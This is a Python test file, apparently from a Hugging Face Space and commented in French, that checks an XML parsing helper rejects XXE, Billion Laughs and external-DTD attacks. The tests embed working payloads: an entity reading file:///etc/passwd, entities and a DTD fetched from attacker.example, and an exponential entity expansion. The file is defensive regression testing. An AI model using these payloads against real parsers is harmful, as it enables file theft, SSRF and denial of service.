Spaces:
Sleeping
Sleeping
Claude
fix(sprint-S1.4): forbid_dtd=True + tests d'attaque XXE/Billion Laughs/DTD
2905909 unverified | """Sprint S1.4 β Tests d'attaque XXE / Billion Laughs / DTD retrieval. | |
| VΓ©rifie que ``picarones.formats._xml_utils.safe_parse_xml`` | |
| **rejette** les payloads malicieux que l'audit prΓ©tendait | |
| dΓ©fendre via ``defusedxml``. | |
| Sans ces tests, la dΓ©fense est invisible : un refactor pourrait | |
| bypasser ``defusedxml`` sans qu'aucun test n'Γ©choue. | |
| Vecteurs couverts | |
| ----------------- | |
| 1. **XXE** (XML External Entity) β rΓ©solution d'entitΓ© vers un | |
| fichier local ``/etc/passwd`` ou une URL distante. | |
| 2. **Billion Laughs** β expansion exponentielle d'entitΓ©s | |
| (``lol1`` β ``lol2`` Γ 10 β ``lol3`` Γ 100 β ...). | |
| 3. **DTD retrieval** β fetch d'une DTD distante (SSRF cΓ΄tΓ© parser). | |
| 4. **Quadratic blowup** β grosse entitΓ© rΓ©pΓ©tΓ©e linΓ©airement. | |
| """ | |
| from __future__ import annotations | |
| from picarones.formats._xml_utils import safe_parse_xml | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # 1. XXE β fichier local | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| class TestXXEFileExfiltration: | |
| """Une entitΓ© externe pointant sur ``/etc/passwd`` doit Γͺtre | |
| refusΓ©e β sinon le parser retourne le contenu du fichier dans | |
| le rΓ©sultat XML.""" | |
| def test_xxe_file_uri_is_blocked(self) -> None: | |
| payload = ( | |
| b'<?xml version="1.0"?>' | |
| b'<!DOCTYPE foo [' | |
| b' <!ENTITY xxe SYSTEM "file:///etc/passwd">' | |
| b']>' | |
| b'<root>&xxe;</root>' | |
| ) | |
| result = safe_parse_xml(payload) | |
| # safe_parse_xml retourne None en cas de dΓ©tection d'attaque | |
| # (defusedxml.EntitiesForbidden / DTDForbidden). | |
| assert result is None, ( | |
| "XXE non bloquΓ© : safe_parse_xml a acceptΓ© un payload " | |
| "avec ``<!ENTITY xxe SYSTEM \"file:///...\">`` ; un " | |
| "attaquant pourrait exfiltrer ``/etc/passwd`` ou tout " | |
| "autre fichier lisible par le process." | |
| ) | |
| def test_xxe_http_uri_is_blocked(self) -> None: | |
| """Variante : entitΓ© externe vers une URL HTTP (SSRF cΓ΄tΓ© | |
| parser, peut exfiltrer la requΓͺte vers un serveur de | |
| l'attaquant).""" | |
| payload = ( | |
| b'<?xml version="1.0"?>' | |
| b'<!DOCTYPE foo [' | |
| b' <!ENTITY xxe SYSTEM "http://attacker.example/leak">' | |
| b']>' | |
| b'<root>&xxe;</root>' | |
| ) | |
| result = safe_parse_xml(payload) | |
| assert result is None | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # 2. Billion Laughs β DoS par expansion d'entitΓ©s | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| class TestBillionLaughs: | |
| """L'attaque historique XML : 10 entitΓ©s imbriquΓ©es β 10^10 | |
| expansion = OOM kill.""" | |
| def test_billion_laughs_is_blocked(self) -> None: | |
| payload = ( | |
| b'<?xml version="1.0"?>' | |
| b'<!DOCTYPE lolz [' | |
| b' <!ENTITY lol "lol">' | |
| b' <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">' | |
| b' <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">' | |
| b' <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">' | |
| b' <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">' | |
| b']>' | |
| b'<lolz>&lol5;</lolz>' | |
| ) | |
| result = safe_parse_xml(payload) | |
| assert result is None, ( | |
| "Billion Laughs non bloquΓ© : le parser a acceptΓ© une " | |
| "expansion exponentielle d'entitΓ©s (DoS / OOM)." | |
| ) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # 3. DTD retrieval β DoCTYPE externe | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| class TestDTDRetrieval: | |
| """Une DTD externe est un fetch HTTP/HTTPS depuis le parser ; | |
| c'est une SSRF + fuite d'info.""" | |
| def test_external_dtd_is_blocked(self) -> None: | |
| payload = ( | |
| b'<?xml version="1.0"?>' | |
| b'<!DOCTYPE root SYSTEM "http://attacker.example/evil.dtd">' | |
| b'<root>data</root>' | |
| ) | |
| result = safe_parse_xml(payload) | |
| assert result is None, ( | |
| "DTD retrieval non bloquΓ© : ``<!DOCTYPE root SYSTEM " | |
| "\"http://...\">`` peut dΓ©clencher une requΓͺte HTTP " | |
| "depuis le serveur Picarones (SSRF)." | |
| ) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # 4. Sanity β XML lΓ©gitime doit passer | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| class TestLegitimateXMLPasses: | |
| """Garde-fou : les durcissements ne doivent pas casser un | |
| document ALTO ou PAGE XML sans entitΓ©s.""" | |
| def test_simple_alto_xml_parses(self) -> None: | |
| payload = ( | |
| b'<?xml version="1.0" encoding="UTF-8"?>' | |
| b'<alto xmlns="http://www.loc.gov/standards/alto/ns-v4#">' | |
| b' <Layout>' | |
| b' <Page WIDTH="1000" HEIGHT="1500"/>' | |
| b' </Layout>' | |
| b'</alto>' | |
| ) | |
| result = safe_parse_xml(payload) | |
| assert result is not None, ( | |
| "ALTO XML lΓ©gitime refusΓ© β fausse alerte." | |
| ) | |
| assert result.tag.endswith("alto") | |
| def test_xml_with_entities_internes_parses(self) -> None: | |
| """Les entitΓ©s HTML standards (&, <, >, ", | |
| ') doivent rester acceptΓ©es (resolved par le parser | |
| sans aller chercher de DTD).""" | |
| payload = ( | |
| b'<?xml version="1.0"?>' | |
| b'<root>R&D <tag></root>' | |
| ) | |
| result = safe_parse_xml(payload) | |
| assert result is not None | |
| assert result.text == "R&D <tag>" | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # 5. XML invalide retourne None (pas d'exception qui remonte) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| class TestInvalidXMLReturnsNone: | |
| def test_truncated_xml_returns_none(self) -> None: | |
| result = safe_parse_xml(b'<root>') | |
| assert result is None | |
| def test_empty_bytes_returns_none(self) -> None: | |
| result = safe_parse_xml(b'') | |
| assert result is None | |
| def test_non_xml_bytes_returns_none(self) -> None: | |
| result = safe_parse_xml(b'not xml at all just text') | |
| assert result is None | |